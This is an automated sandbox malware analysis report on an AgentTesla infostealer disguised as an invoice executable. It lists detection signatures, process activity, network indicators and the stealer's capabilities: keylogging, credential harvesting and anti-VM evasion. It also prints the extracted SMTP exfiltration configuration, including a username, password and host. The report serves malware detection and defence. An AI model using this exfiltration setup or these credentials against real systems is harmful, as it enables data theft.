Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Proforma Invoice.exe

Overview

General Information

Sample Name:Proforma Invoice.exe
Analysis ID:502592
MD5:dd00dde252a92512815c0d0d3679d1fd
SHA1:44ca2aa75de6ca79ae39408b48cd605d384a9a9b
SHA256:c0057025e69297714ba47f8fc982ec8fd8713f5a270a2d638257bcc395cad39f
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Executable has a suspicious name (potential lure to open the executable)
Moves itself to temp directory
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Proforma Invoice.exe (PID: 6844 cmdline: 'C:\Users\user\Desktop\Proforma Invoice.exe' MD5: DD00DDE252A92512815C0D0D3679D1FD)
    • Proforma Invoice.exe (PID: 5608 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: DD00DDE252A92512815C0D0D3679D1FD)
    • Proforma Invoice.exe (PID: 6804 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: DD00DDE252A92512815C0D0D3679D1FD)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "kendakenda@karanex.com", "Password": "zarazita404", "Host": "webmail.karanex.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Proforma Invoice.exe.3846860.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.Proforma Invoice.exe.3846860.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                4.2.Proforma Invoice.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.Proforma Invoice.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.Proforma Invoice.exe.3846860.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 6 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 4.2.Proforma Invoice.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "kendakenda@karanex.com", "Password": "zarazita404", "Host": "webmail.karanex.com"}
                      Machine Learning detection for sampleShow sources
                      Source: Proforma Invoice.exeJoe Sandbox ML: detected
                      Source: 4.2.Proforma Invoice.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: Proforma Invoice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Proforma Invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49841 -> 185.8.128.141:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49842 -> 185.8.128.141:587
                      Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                      Source: Joe Sandbox ViewIP Address: 185.8.128.141 185.8.128.141
                      Source: global trafficTCP traffic: 192.168.2.3:49841 -> 185.8.128.141:587
                      Source: global trafficTCP traffic: 192.168.2.3:49841 -> 185.8.128.141:587
                      Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://LqBkoD7aW7iu.org
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://rafeBU.com
                      Source: Proforma Invoice.exe, 00000004.00000002.562871223.000000000319E000.00000004.00000001.sdmpString found in binary or memory: http://webmail.karanex.com
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: Proforma Invoice.exe, 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, Proforma Invoice.exe, 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: webmail.karanex.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Proforma Invoice.exe
                      Contains functionality to register a low level keyboard hookShow sources
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_013627B4 SetWindowsHookExW 0000000D,00000000,?,?
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: Proforma Invoice.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 4.2.Proforma Invoice.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b334B4886u002d2F78u002d4310u002dAD8Du002d8030633F3870u007d/u0035BFC86F3u002d17F0u002d46D9u002dB37Au002d34C66161B569.csLarge array initialization: .cctor: array initializer size 12019
                      Executable has a suspicious name (potential lure to open the executable)Show sources
                      Source: Proforma Invoice.exeStatic file information: Suspicious name
                      Source: Proforma Invoice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_002A4C21
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00C5E9C0
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00C5E9D0
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00C5C9DC
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 3_2_002E4C21
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_00B24C21
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_01293530
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_01290040
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_0129DF10
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_012997D0
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_01296A18
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_012956B0
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_01290014
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_0129A3C8
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_0136A088
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_01361B80
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_01369C94
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_013C64B8
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_013C5758
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_02DE4860
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_02DE3F08
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_02DE4770
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_02DE8508
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_02DE4810
                      Source: Proforma Invoice.exeBinary or memory string: OriginalFilename vs Proforma Invoice.exe
                      Source: Proforma Invoice.exe, 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll< vs Proforma Invoice.exe
                      Source: Proforma Invoice.exe, 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamejKFYOWLbQkFBIMPfWhghzZgVT.exe4 vs Proforma Invoice.exe
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs Proforma Invoice.exe
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpBinary or memory string: yl,\\StringFileInfo\\000004B0\\OriginalFilename vs Proforma Invoice.exe
                      Source: Proforma Invoice.exeBinary or memory string: OriginalFilename vs Proforma Invoice.exe
                      Source: Proforma Invoice.exeBinary or memory string: OriginalFilename vs Proforma Invoice.exe
                      Source: Proforma Invoice.exe, 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamejKFYOWLbQkFBIMPfWhghzZgVT.exe4 vs Proforma Invoice.exe
                      Source: Proforma Invoice.exe, 00000004.00000002.560597448.0000000000F38000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Proforma Invoice.exe
                      Source: Proforma Invoice.exeBinary or memory string: OriginalFilenamec.exe8 vs Proforma Invoice.exe
                      Source: Proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\Proforma Invoice.exe 'C:\Users\user\Desktop\Proforma Invoice.exe'
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Proforma Invoice.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/2@1/1
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: 4.2.Proforma Invoice.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.2.Proforma Invoice.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Proforma Invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: Proforma Invoice.exe, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.2.Proforma Invoice.exe.2a0000.0.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.0.Proforma Invoice.exe.2a0000.0.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Proforma Invoice.exe.2e0000.0.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.2.Proforma Invoice.exe.2e0000.0.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.2.Proforma Invoice.exe.b20000.1.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.Proforma Invoice.exe.b20000.0.unpack, WinUsbInitForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_02DEDF16 push FFFFFF8Bh; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.95675018012

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Moves itself to temp directoryShow sources
                      Source: c:\users\user\desktop\proforma invoice.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG154.tmpJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
